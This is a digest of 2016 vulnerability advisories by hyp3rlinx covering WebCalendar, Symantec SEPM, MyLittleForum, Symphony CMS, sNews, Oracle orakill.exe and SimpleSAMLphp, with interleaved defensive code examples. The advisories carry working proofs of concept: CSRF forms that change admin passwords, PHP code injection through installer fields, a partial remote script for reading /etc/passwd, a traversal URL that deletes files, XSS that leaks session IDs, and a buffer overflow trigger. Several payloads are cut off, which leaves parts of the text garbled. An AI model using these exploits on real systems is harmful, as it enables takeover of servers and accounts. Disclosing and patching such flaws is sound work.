WebCalendar can be set up in a variety of ways, such as...

A schedule management system for a single person
A schedule management system for a group of people, allowing one or more 
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new events
A calendar server that can be viewed with iCalendar-compliant calendar 
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.




Vulnerability Type:
==
CSRF PROTECTION BYPASS



CVE Reference:
==
N/A



Vulnerability Details:
=

WebCalendar attempts to use the HTTP Referer to check that requests are 
originating from the same server, as we see below.

From WebCalendar "include/functions.php" file on line 6117:

function require_valide_referring_url ()
{
  global $SERVER_URL;

  if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
    // Missing the REFERER value
    //die_miserable_death ( translate ( 'Invalid referring URL' ) );
    // Unfortunately, some version of MSIE do not send this info.
    return true;
  }

  if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
    // Gotcha.  URL of referring page is not the same as our server.
    // This can be an instance of XSRF.
    // (This may also happen when more than address is used for your server.
    // However, you're not supposed to do that with this version of
    // WebCalendar anyhow...)
    die_miserable_death ( translate ( 'Invalid referring URL' ) );
  }
}

However, this can be easily defeated by just not sending a referer. HTML 5 
includes a handy meta tag that tells the browser to omit the referer when 
making an HTTP request, currently supported in Chrome, Safari, MobileSafari and 
other WebKit-based browsers. Using this meta tag we send no referrer, and the 
vulnerable application will then happily process our CSRF requests.
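The WebCalendar referer check above and the Nagios Network Analyzer CSRF vectors earlier in this digest fail the same way: a state-changing POST is accepted on evidence the browser controls. As an added example (not the code of either project), the function below re-creates the quoted require_valide_referring_url() logic in Python, puts a fail-closed referer check beside it, and adds the synchronizer token that does not depend on a header a browser may omit. SERVER_URL is the page's own install path; the request samples and the secret are constructed.

```python
"""Referer-only CSRF protection beside a synchronizer token.

Added example, not WebCalendar's or Nagios' code. referer_check_webcalendar()
re-creates in Python the logic quoted from include/functions.php;
referer_check_strict() is the fail-closed variant; the token functions are the
check that does not depend on a header the browser may omit. SERVER_URL is the
page's install path; the requests and secret are constructed.
"""
import hashlib
import hmac
import re
from urllib.parse import urlsplit

SERVER_URL = "http://localhost/WebCalendar-1.2.7/"


def referer_check_webcalendar(headers: dict) -> bool:
    """Mirror of require_valide_referring_url(): True means the POST is accepted."""
    referer = headers.get("Referer", "")
    if not referer:
        # Accepted for the sake of old MSIE builds. A page that suppresses the
        # Referer (the advisory's meta tag) lands here and is waved through.
        return True
    # preg_match("@$SERVER_URL@i", ...) is a case-insensitive regex search.
    return re.search(SERVER_URL, referer, re.IGNORECASE) is not None


def referer_check_strict(headers: dict) -> bool:
    """Fail closed: no Referer is a rejection, and only an exact origin match passes."""
    referer = headers.get("Referer", "")
    if not referer:
        return False
    want, got = urlsplit(SERVER_URL), urlsplit(referer)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def issue_csrf_token(session_id: str, secret: bytes) -> str:
    """Token embedded in every state-changing form; bound to the session by HMAC."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(form: dict, session_id: str, secret: bytes) -> bool:
    """Accept a POST only if it carries the token issued to this session."""
    expected = issue_csrf_token(session_id, secret)
    return hmac.compare_digest(form.get("csrf_token", ""), expected)


def accept_post(headers: dict, form: dict, session_id: str, secret: bytes) -> bool:
    """Both checks together: a forged request must defeat the token, not just a header."""
    return referer_check_strict(headers) and csrf_token_valid(form, session_id, secret)


# Constructed requests: a forged POST from a page that sends no Referer (the
# bypass in the advisory), a forged POST from a foreign page, and a legitimate one.
SECRET = b"server-side-secret-for-this-example"
SESSION = "sess-1234"
FORGED_NO_REFERER = ({"Host": "localhost"}, {"setting": "attacker-value"})
FORGED_FOREIGN = ({"Referer": "http://attacker.example/csrf.html"}, {"setting": "attacker-value"})
LEGITIMATE = (
    {"Referer": "http://localhost/WebCalendar-1.2.7/edit_user.php"},
    {"setting": "new-value", "csrf_token": issue_csrf_token(SESSION, SECRET)},
)

if __name__ == "__main__":
    for name, (hdrs, form) in [("no Referer", FORGED_NO_REFERER),
                               ("foreign Referer", FORGED_FOREIGN),
                               ("legitimate", LEGITIMATE)]:
        print(name, "| webcalendar check:", referer_check_webcalendar(hdrs),
              "| hardened:", accept_post(hdrs, form, SESSION, SECRET))
```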



Exploit code(s):
===

1) CSRF Protection Bypass to change Admin password POC. Note: the name of the 
victim user is required for success.




http://localhost/WebCalendar-1.2.7/edit_user_handler.php;  
method="post">







2) CSRF Protection Bypass modify access controls under "System Settings" / 
"Allow public access" 



http://localhost/WebCalendar-1.2.7/admin.php; method="post" 
name="prefform">



document.getElementById('CSRF_ACCESS_CTRL').submit()





Disclosure Timeline:
===
Vendor Notification:  No replies
July 4, 2016 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N



HYP3RLINX



WebCalendar v1.2.7 PHP Code Injection

2016-07-04 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-PHP-CODE-INJECTION.txt

[+] ISR: ApparitionSec



Vendor:
==
www.k5n.us/webcalendar.php



Product:
==
WebCalendar v1.2.7

WebCalendar is a PHP-based calendar application that can be configured as a 
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, 
MS SQL Server, or ODBC is required.

WebCalendar can be setup in a variety of ways, such as...

A schedule management system for a single person
A schedule management system for a group of people, allowing one or more 
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new events
A calendar server that can be viewed with iCalendar-compliant calendar 
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.



Vulnerability Type:
==
PHP Code Injection



CVE Reference:
==
N/A



Vulnerability Details:
=

Since WebCalendar's install script is not removed after installation (there is 
no "automatic" removal of it), low-privileged users can inject arbitrary PHP 
code as the "Database Cache" directory value, because no input validation exists 
for it when a user installs the application using the WebCalendar walk-thru 
wizard. 

If WebCalendar's installation script is available as part of a default image, 
often as a convenience by some hosting providers, this can be used to gain code 
execution on the target system. The only requirement is that the user must have 
privileges to authenticate to the MySQL database and to run the install script. 
So, users who have install wizard access for the WebCalendar application will 
have the ability to launch arbitrary system commands on the affected host.

One problem we must overcome is that WebCalendar filters quotes ", so we cannot 
use code that relies on them. However, we can defeat this obstacle using the 
all-too-forgotten backtick `CMD` operator!

e.g.

*/?>

This results in "settings.php" being injected like...


readonly: false
user_inc: user.php
use_http_auth: false
single_user: false
# end settings.php */
?>



Exploitation step(s):
=

1) Login to the WebCalendar Installation Wizard.

2) Proceed to Step 2 of the WebCalendar Installation Wizard install script:
http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch=2

3) Click the "Test Settings" button to ensure the connection to the database works.
4) Enter the PHP code below as the value of the "Database Cache Directory:" input
field to pop the calculator as a POC (Windows).

 */?>

5) Click "Next" button
6) Click "Next" button 
7) Click "Save settings" button

BOOOM! "settings.php" gets overwritten and injected with our PHP code.

If you happen to get the following error when clicking the "Test Settings" button,
"Failure Reason: Database Cache Directory does not exist", just click the back
button then forward, or just click the "Test settings" button again to try to get
past the error.


Disclosure Timeline:
===
Vendor Notification:  No Replies
July 4, 2016 : Public Disclosure



Severity Level:

8.0 (High)
CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX


Symantec SEPM v12.1 Multiple Vulnerabilities

2016-06-28 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX 

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/SYMANTEC-SEPM-MULTIPLE-VULNS.txt

[+] ISR: ApparitionSec



Vendor:

www.symantec.com



Product:
===
SEPM
Symantec Endpoint Protection Manager and client v12.1

SEPM provides a centrally managed solution. It handles security policy 
enforcement, host integrity checking (Symantec Network Access Control only),
and automated remediation over all clients. The policies functionality is the 
heart of the Symantec software. Clients connect to the server to get the
latest policies, security settings, and software updates.



Vulnerability Type(s):
==
Multiple Cross Site Scripting (XSS)
Cross Site Request Forgeries (CSRF)
Open Redirect



CVE Reference(s):
=
CVE-2016-3652 / XSS
CVE-2016-3653 / CSRF
CVE-2016-5304 / Open Redirect



Vulnerability Details:
=

The management console for SEPM contains a number of security vulnerabilities
that could be used by a lower-privileged user or by an unauthorized user to
elevate privileges or gain access to unauthorized information on the management
server. Exploitation attempts for these vulnerabilities require access to the
SEP Management console.



References:

https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20160628_01



Exploit code(s):
===

In this case XSS can bypass the "http-only" cookie protection because the SEPM
application writes and stores the session ID within various JavaScript functions
used by the application within the DOM, thereby exposing it directly to the XSS
attack.

1) createModalDialogFromURL
2) createWindowFromURL
3) createWindowFromForm
4) createIEWindowFromForm

So all we need to do is alert() any one of these functions, e.g.
alert(createModalDialogFromURL), and it will leak the session ID, essentially
throwing the HttpOnly secure cookie protection flag into the garbage.

e.g. 

XSS POC: defeat the http-only flag and access PHPSESSID:

https://localhost:8445/Reporting/Admin/notificationpopup.php?New=1=CR=alert%28createModalDialogFromURL%29#



Open Redirect in external URL .php script: 
=

A reporting URL used to route generated reports externally to any authorized 
URL is susceptible to an open redirect vulnerability
that could have allowed an authorized but less-privileged user to redirect an 
unsuspecting privileged user to an external URL to
attempt further exploitation, e.g. phishing.


If a victim clicks on a link supplied by an attacker

e.g.

https://localhost:8445/Reporting/common/externalurl.php?url=http://hyp3rlinx.altervista.org



Cross Site Request Forgery (CSRF):
==

Multiple Cross Site Request Forgeries exist in a couple of places within this
version of SEPM. Below is an example of sending a scheduled report to a remote
attacker's email if the currently logged-in user visits a malicious webpage or
clicks an infected link, etc.


Symantec Reporting Admin CSRF POC:

https://localhost:8445/Reporting/Reports/sr-save.php; 
method="POST" />

document.getElementById('PWN').submit()





Disclosure Timeline:

Vendor Notification: February 11, 2016
Vendor Acknowledges Report: February 12, 2016
Vendor Releases Fix: June 28, 2016
June 29, 2016 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level(s):

Cross Site Scripting
Medium
v2 6.8
AV:A/AC:M/Au:S/C:C/I:C/A:N
v3 6.7
AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Cross Site Request Forgery
High
v2 7.0
AV:A/AC:M/Au:M/C:C/I:C/A:C
v3 7.1
AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Open Redirect
Medium
v2 4.1
AV:A/AC:L/Au:S/C:P/I:P/A:N
v3 4.1
AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N




hyp3rlinx


MyLittleForum v2.3.5 PHP Command Injection

2016-06-27 Thread hyp3rlinx
[+] Credits: hyp3rlinx 

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MYLITTLEFORUM-PHP-CMD-EXECUTION.txt

[+] ISR: APPARITIONSEC



Vendor:
=
mylittleforum.net

Download:
github.com/ilosuna/mylittleforum/releases/tag/v2.3.5


Product:
===
MyLittleForum 2.3.5

my little forum is a simple PHP and MySQL based internet forum that displays 
the messages in classical threaded
view (tree structure). The main claim of this web forum is simplicity. 
Furthermore it should be easy to install
and run on a standard server configuration with PHP and MySQL.



Vulnerability Type:
===
PHP Command Execution



CVE Reference:
==
N/A



Vulnerability Details:
=

When setting up the mylittleforum CMS, users have to walk through an installation
script and provide details for the application like the forum's email address,
name, admin email, admin password, database name, etc.

However, no input validation / checks exist for that installation script.
Low-privileged users can then supply arbitrary PHP code for the Database Name.
The PHP command values get written to the config/db_settings.php file and
processed by the application. Since we supply an invalid Database Name, a MySQL
error will be thrown, but the injected PHP payload will also be executed on the
host system.

If the CMS is installed by a low-privileged user and that user has basic MySQL
database authorization to run the install for the CMS, it can result in privilege
escalation, remote command execution and complete takeover of the host server.

The /config/db_settings.php file is protected by an .htaccess file, but we can
write directly to the "db_settings.php" file and execute code directly from the
/install/index.php file, bypassing any access control provided by the .htaccess
file, or we can just delete it by adding a call to the PHP function
@unlink('.htaccess') to our injected PHP payload.
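Both the WebCalendar advisory above and this one share a root cause: an installer writes an unvalidated field straight into a PHP configuration file. The following is an added example (not the author's code and not part of either project) of how an installer can validate such a value and write the file so that a value can never escape its setting; `validate_cache_dir`, `write_settings` and the `db_cache_dir` key are assumed names.

```php
<?php
// Added example: validate an installer-supplied value before it is written
// into a PHP settings file. Not WebCalendar or mylittleforum code.

// Reject anything that could end the setting early. PHP tags, comment
// delimiters and line breaks all let a value spill into the file's own
// syntax, which is exactly what the comment-close break-out above relies on.
function validate_config_value(string $value): string
{
    foreach (['<?', '?>', '*/', '/*', "\n", "\r", "\0"] as $bad) {
        if (strpos($value, $bad) !== false) {
            throw new InvalidArgumentException("forbidden sequence in value");
        }
    }
    // Filtering only the double quote is what left the backtick operator open
    // in WebCalendar, so refuse the whole family rather than one member of it.
    if (preg_match('/[`"\']/', $value)) {
        throw new InvalidArgumentException("quotes and backticks are not allowed");
    }
    return $value;
}

/** A cache directory must additionally be an existing directory. */
function validate_cache_dir(string $dir): string
{
    $dir  = validate_config_value($dir);
    $real = realpath($dir);
    if ($real === false || !is_dir($real)) {
        throw new InvalidArgumentException("cache directory does not exist");
    }
    return $real;
}

/**
 * Write the settings as a PHP array via var_export(), so every value is a
 * correctly quoted literal rather than text pasted into a comment block, and
 * refuse to run at all once a settings file exists: the installer should not
 * be usable after installation.
 */
function write_settings(string $path, array $settings): void
{
    if (file_exists($path)) {
        throw new RuntimeException("already installed; remove the install script");
    }
    $php = "<?php\nreturn " . var_export($settings, true) . ";\n";
    if (file_put_contents($path, $php, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $path");
    }
}

// Constructed inputs: a legitimate directory, a comment/PHP-tag break-out,
// and a value carrying the backtick operator.
$attempts = [
    sys_get_temp_dir(),
    sys_get_temp_dir() . ' */?>',
    sys_get_temp_dir() . '/`x`',
];
$settings_file = sys_get_temp_dir() . '/settings-demo-' . getmypid() . '.php';
foreach ($attempts as $input) {
    try {
        $dir = validate_cache_dir($input);
        write_settings($settings_file, ['db_cache_dir' => $dir, 'readonly' => false]);
        echo "accepted: $dir\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: ", $e->getMessage(), "\n";
    }
}
```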


1) Browse to http://localhost/mylittleforum-2.3.5/install/index.php


2) For Database Name input field enter the below PHP code for POC.
';?>news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

etc...


Exploit code(s):
===

1) Download and unpack mylittleforum-2.3.5, upload it to a web server (Linux),
chmod -R 777, etc.
2) Run the PHP script below from the command line on a remote workstation
3) BOOM, we can now read the Linux "/etc/passwd" file on the remote server


,,,\r\n";
    echo "= by hyp3rlinx ===\r\n";
exit();
}

$port=80;   #Default port
$victim=$argv[1];   #IP
$user=$argv[2]; #MySQL username
$pwd=$argv[3];  #MySQL password
$root_dir=$argv[4]; #/mylittleforum-2.3.5
$uri="/install/index.php";  #PHP CMD inject entry point

$s = fsockopen($victim, $port, $errno, $errstr, 10);
if(!$s){echo "Cant connect to the server!"; exit();}

$CMD_INJECTTION="forum_name=PWN".
"_address=http://$victim/$root_dir/;.
"_email=x...@x.com".
"_name=$user".
"_email=x...@x.com".
"_pw=$pwd".
"_pw_conf=$pwd".
"=localhost".
"=';?>



Disclosure Timeline:
=
Vendor Notification: No Reply
June 27, 2016 : Public Disclosure



Exploitation Technique:
===
Remote 



Severity Level:
===
(High) 8.7 
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N




hyp3rlinx


Symphony CMS v2.6.7 Session Fixation

2016-06-20 Thread hyp3rlinx
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/SYMPHONY-CMS-SESSION-FIXATION.txt

[+] ISR: APPARITIONSEC


Vendor:

www.getsymphony.com


Product:
==
Symphony CMS v2.6.7 

Download:
http://www.getsymphony.com/download/


Symphony is a XSLT-powered open source content management system.



Vulnerability Type:
===
Session Fixation


CVE Reference:
==
CVE-2016-4309



Vulnerability Details:
=

Symphony CMS is prone to "Session Fixation", allowing attackers to preset a
user's PHPSESSID "Session Identifier". If the application is deployed using an
insecure setup with the PHP.INI setting "session.use_only_cookies" not enabled,
attackers can send victims a link to the vulnerable application with the
"PHPSESSID" already initialized, as Symphony does not use or call
"session_regenerate_id()" upon successful user authentication.

Note: as per php.net/manual/en/session.configuration.php 
"session.use_only_cookies=1" is default since PHP 4.3.0.

e.g.

"http://localhost/symphony/?PHPSESSID=APPARITION666".

As Symphony's Session ID is not regenerated, an arbitrary Session ID can be
'fixated' to a user. If that user authenticates using this attacker-supplied
session-fixated link, the attacker can then access the affected application
from a different computer/browser with the same level of access as the victim.
The default cookie lifetime for Symphony CMS is up to two weeks.
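An added example (not Symphony's code) of the two controls that close the window described above: PHP session settings that ignore a URL-supplied PHPSESSID, and a session_regenerate_id() call at the moment of authentication. The function names and the login argument are assumptions; the ini keys and session_* calls are PHP's own.

```php
<?php
// Added example, not Symphony CMS code. The function names below are
// assumptions; the ini keys and session_* calls are standard PHP.

/** Configure the session before session_start(); run on every request. */
function harden_session(): void
{
    // Only cookies carry the ID: ?PHPSESSID=... in the URL is ignored.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    // PHP >= 5.5.2: an ID the server never issued (such as APPARITION666)
    // is discarded and a fresh one generated, even if it arrived in a cookie.
    ini_set('session.use_strict_mode', '1');
    ini_set('session.cookie_httponly', '1');
    if (!empty($_SERVER['HTTPS'])) {
        ini_set('session.cookie_secure', '1');
    }
    session_start();
}

/**
 * Called only after the credentials have been verified. Whatever ID the
 * browser presented before login is discarded, so a value planted through a
 * link no longer identifies the authenticated session.
 */
function on_successful_login(int $user_id): array
{
    $before = session_id();
    // true: also delete the old session's data, so the old ID is dead server-side.
    session_regenerate_id(true);
    $_SESSION['user_id']      = $user_id;
    $_SESSION['logged_in_at'] = time();
    return ['old' => $before, 'new' => session_id()];
}

/**
 * Detection aid: a session ID arriving in the query string or POST body is a
 * fixation attempt worth logging even when the settings above already block it.
 */
function session_id_in_request(array $get, array $post): bool
{
    $name = session_name(); // PHPSESSID unless renamed
    return isset($get[$name]) || isset($post[$name]);
}

// Demo (works from the CLI): the ID changes across login, and a constructed
// request carrying the ID in the URL is flagged.
harden_session();
print_r(on_successful_login(42));
var_dump(session_id_in_request(['PHPSESSID' => 'APPARITION666'], []));
```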



Reproduction steps:
=

Edit PHP.INI and change the following setting to 'session.use_only_cookies=0' if
applicable, as a POC test.


1) Telnet localhost 80

2) Make an HTTP request with a pre-set PHPSESSID

GET /symphony-2.6.7/symphony/?PHPSESSID=PWN3D666 HTTP/1.1
Host: localhost
Connection: close

3) Hit enter twice


HTTP/1.1 200 OK
Date: Mon, 16 May 2016 02:06:47 GMT
Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1l PHP/5.6.8
X-Powered-By: PHP/5.6.8
Set-Cookie: PHPSESSID=PWNED666; expires=Mon, 30-May-2016 02:06:48 GMT; 
Max-Age=1209600; path=/symphony-2.6.7; httponly
Content-Length: 1501
Connection: close
Content-Type: text/html; charset=UTF-8



Exploit code(s):
===

1) 
http://localhost/symphony-2.6.7/symphony/publish/articles/?PHPSESSID=hyp3rlinx

2) http://localhost/symphony-2.6.7/symphony/?PHPSESSID=APPARITION


Disclosure Timeline:
=
Vendor Notification: May 3, 2016
Vendor Release Fix: May 23, 2016
June 20, 2016 : Public Disclosure.


Exploitation Method:

Remote


Severity Level:

6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N



Description:
==
Request Method(s):   [+] GET / POST


Vulnerable Product:  [+] Symphony CMS 2.6.7


Vulnerable Parameter(s): [+] 'PHPSESSID'
===


hyp3rlinx


sNews CMS v1.7.1 Remote Command Execution / CSRF / XSS

2016-06-20 Thread hyp3rlinx
[+] Credits: hyp3rlinx 

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/SNEWS-RCE-CSRF-XSS.txt

[+] ISR: APPARITIONSEC



Vendor:

snewscms.com



Product:

sNews CMS v1.7.1



Vulnerability Type:
===
Persistent Remote Command Execution
Cross Site Request Forgeries (CSRF)
Persistent XSS



CVE Reference:
==
N/A



Vulnerability Details:
==

If an authenticated user happens to stumble upon an attacker's webpage or click
an infected link, they have a chance to win the following prizes:

1) Persistent Remote Code Execution
2) Cross Site Request Forgeries
3) Persistent XSS  


sNews has a feature that allows PHP functions to be inserted into articles by
authenticated users under "Edit Article". However, there are no CSRF
tokens/checks to prevent unauthorized HTTP requests from being made on behalf of
that user. Furthermore, these commands get stored in the MySQL database in the
'articles' table, so each time that sNews webpage is visited they will execute.

e.g.

CSRF / RCE Under "Edit Article" Admin area.

[func]system:|:"calc.exe"[/func]

On line 3270 of "snews.php" there is no input filtering, allowing arbitrary
system calls:

$returned = call_user_func_array($func[0], explode(',',$func[1]));
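An added example (not sNews code) of how the `[func]name:|:arg,arg[/func]` syntax handled on line 3270 can be dispatched safely: the name is looked up in a fixed allowlist instead of being handed to call_user_func_array() verbatim. The parser and the allowlist contents are assumptions standing in for sNews's own.

```php
<?php
// Added example, not sNews code: dispatch [func]...[/func] tags through an
// allowlist instead of calling whatever name the stored article contains.

// The only names article text may invoke, each mapped to the callable the
// application trusts. "system" is simply absent, so it cannot resolve.
const ARTICLE_FUNCS = [
    'date'  => 'date',
    'upper' => 'strtoupper',
    'words' => 'str_word_count',
];

/** Split one "name:|:arg1,arg2" tag body the same way sNews does. */
function parse_func_tag(string $body): array
{
    $func = explode(':|:', $body, 2);
    $name = trim($func[0]);
    $args = isset($func[1]) ? explode(',', $func[1]) : [];
    return [$name, $args];
}

/**
 * Render every [func] tag in $text. Unknown names are escaped and shown as
 * literal text instead of executed, and collected in $rejected for logging.
 */
function render_article(string $text, array &$rejected = []): string
{
    return preg_replace_callback(
        '/\[func\](.*?)\[\/func\]/s',
        function (array $m) use (&$rejected): string {
            [$name, $args] = parse_func_tag($m[1]);
            if (!array_key_exists($name, ARTICLE_FUNCS)) {
                $rejected[] = $name;
                return htmlspecialchars($m[0], ENT_QUOTES, 'UTF-8');
            }
            $out = call_user_func_array(ARTICLE_FUNCS[$name], $args);
            return htmlspecialchars((string)$out, ENT_QUOTES, 'UTF-8');
        },
        $text
    );
}

// Constructed article: one permitted tag and the pattern from this advisory.
$article  = 'Hello [func]upper:|:world[/func]. ';
$article .= '[func]system:|:"calc.exe"[/func]';
$rejected = [];
echo render_article($article, $rejected), "\n";
echo 'rejected: ', implode(', ', $rejected), "\n";
```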




CSRF / Hijack sNews CMS accounts: the username must however be known in advance;
if it is known, then that lucky user wins a changed password!





CSRF / arbitrary file deletion: we can delete arbitrary files in the webroot,
which can be used to bypass access controls like the ".htaccess" file, allowing
attackers to read/access files from those affected directories.

On line 3080 of "snews.php" untrusted user input is used directly in the PHP
"unlink" function, which deletes any file the attacker wants.

if (isset($_GET['task']) == 'delete') { // isset() returns a bool, and true == 'delete' holds, so this runs for any 'task' value
$file_to_delete = $_GET['folder'].'/'.$_GET['file']; // both parts come straight from the request, with no containment check
@unlink($file_to_delete); // "../" in either value walks out of the intended directory
echo notification(0,'','snews_files');
}


///


A persistent XSS entry point also exists in the same "Edit Article" Admin area,
but why bother when we have the RCE option.


Exploit code(s):
===

Remote Command Execution POC, pops "calc.exe".

http://localhost/snews1.7.1/?action=process=admin_article=2;>

document.getElementById('CSRF_RCE_PRIZE').submit()



After we make an HTTP request for the booby-trapped article: KABOOM.

http://localhost/snews1.7.1/uncategorized/remote-command-execution/


CSRF - Account Hijack
=

http://localhost/snews1.7.1/?action=process=changeup;>





document.getElementById('CSRF-CHG-PASSWD-PRIZE').submit()



CSRF - Arbitrary File Deletion
===

1) Create a file in htdocs / the web root as a test, e.g. "DELETEME.php"

2) Visit the following URL as an authenticated user.

http://localhost/snews1.7.1/?action=snews_files=delete=Patches 
Log=../../../DELETEME.php

3) File's gone!



Persistent XSS
===

http://localhost/snews1.7.1/?action=process=admin_article=2;>

document.getElementById('XSS').submit()





Disclosure Timeline:
=
Vendor Notification:  No Replies
June 19, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

Critical
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N



Description:

Request Method(s):[+]  GET / POST


Vulnerable Product:   [+] snews v1.7.1
===


by hyp3rlinx


Oracle Orakill.exe Buffer Overflow

2016-06-14 Thread hyp3rlinx
[+] Credits: hyp3rlinx 

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ORACLE-ORAKILL.EXE-BUFFER-OVERFLOW.txt

[+] ISR: apparitionsec



Vendor:
==
www.oracle.com



Product:
===
orakill.exe v11.2.0


The orakill utility is provided with Oracle databases on Windows platforms. The 
executable (orakill.exe) is available to DBAs to kill Oracle
sessions directly from the DOS command line without requiring any connection to 
the database.


C:\oraclexe\app\oracle\product\11.2.0\server\bin>orakill.exe -h

Usage:  orakill sid thread

  where sid  = the Oracle instance to target
thread = the thread id of the thread to kill

  The thread id should be retrieved from the spid column of a query such as:

select spid, osuser, s.program from
v$process p, v$session s where p.addr=s.paddr




Vulnerability Type:
===
Buffer Overflow



Reference:
==
http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html



Vulnerability Details:
=

A ToLower() filter is applied to the supplied arguments, e.g. 'A' \x41 becomes
'a' \x61, etc.; it may be possible to subvert this using an encoder technique
like "ALPHA3". Also, we need to supply a second argument of just 4 bytes to
trigger the access violation.

orakill.exe <104 bytes>, <4 bytes>

Register dump.

EAX 4000
ECX 0018FCA8 ASCII 
""
EDX 
EBX 61616161
ESP 0018FD10 ASCII 
""
EBP 61616161
ESI 61616161
EDI 61616161
EIP 61616161
C 0  ES 002B 32bit 0()
P 0  CS 0023 32bit 0()
A 0  SS 002B 32bit 0()
Z 0  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0()
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
   3 2 1 0  E S P U O Z D I
FST   Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask1 1 1 1 1 1



Exploit code(s):


import subprocess

pgm="C:\\oraclexe\\app\\oracle\\product\\11.2.0\\server\\bin\\orakill.exe "

payload="A"*100 + ""
subprocess.Popen([pgm, payload, " "], shell=False)




Disclosure Timeline:

Vendor Notification:  October 5, 2015
Vendor Fix: April 25, 2016
June 13, 2016 : Public Disclosure



Exploitation Technique:
===
Local



Severity Level:

Low





hyp3rlinx


SimpleSAMLphp Link Injection

2016-06-09 Thread hyp3rlinx
[+] Credits: John Page aka hyp3rlinx 

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/SIMPLESAML-PHP-LINK-INJECTION.txt

[+] ISR: apparitionsec



Vendor:
=
simplesamlphp.org



Product:
==
simplesamlphp < 1.14.4



Vulnerability Type:
===
Link Injection



CVE Reference:
==
N/A



Vulnerability Details:
=

Several scripts part of SimpleSAMLphp display a web page with links obtained 
from the request parameters. This is supposed to enhance
usability, as the users are presented with links they can follow after 
completing a certain action, like logging out.

The following scripts do not check the URLs obtained via the HTTP request 
before displaying them as the target of links that the user
may click on:

www/logout.php
modules/core/www/no_cookie.php

The issue allowed attackers to display links targeting a malicious website 
inside a trusted site running SimpleSAMLphp, due to the lack
of security checks involving the link_href and retryURL HTTP parameters, 
respectively. The issue was resolved by including a verification
of the URLs received in the request against a white list of websites specified 
in the trusted.url.domains configuration option.


References:
https://simplesamlphp.org/security/201606-01

Affected versions:
All SimpleSAMLphp versions prior to 1.14.4.

Impact:
A remote attacker could craft a link or pop up webpage pointing to a trusted 
website running SimpleSAMLphp, including a parameter pointing
to a malicious website, to fool the victim into visiting that website by 
clicking on a link in the page presented by the "trusted" SimpleSAMLphp
application.


Vulnerable Code:


"no_cookie.php" ...
==


if (isset($_REQUEST['retryURL'])) {
$retryURL = (string)$_REQUEST['retryURL'];
$retryURL = \SimpleSAML\Utils\HTTP::normalizeURL($retryURL);
} else {
$retryURL = NULL;
}

$globalConfig = SimpleSAML_Configuration::getInstance();
$t = new SimpleSAML_XHTML_Template($globalConfig, 'core:no_cookie.tpl.php');
$t->data['retryURL'] = $retryURL;
$t->show();


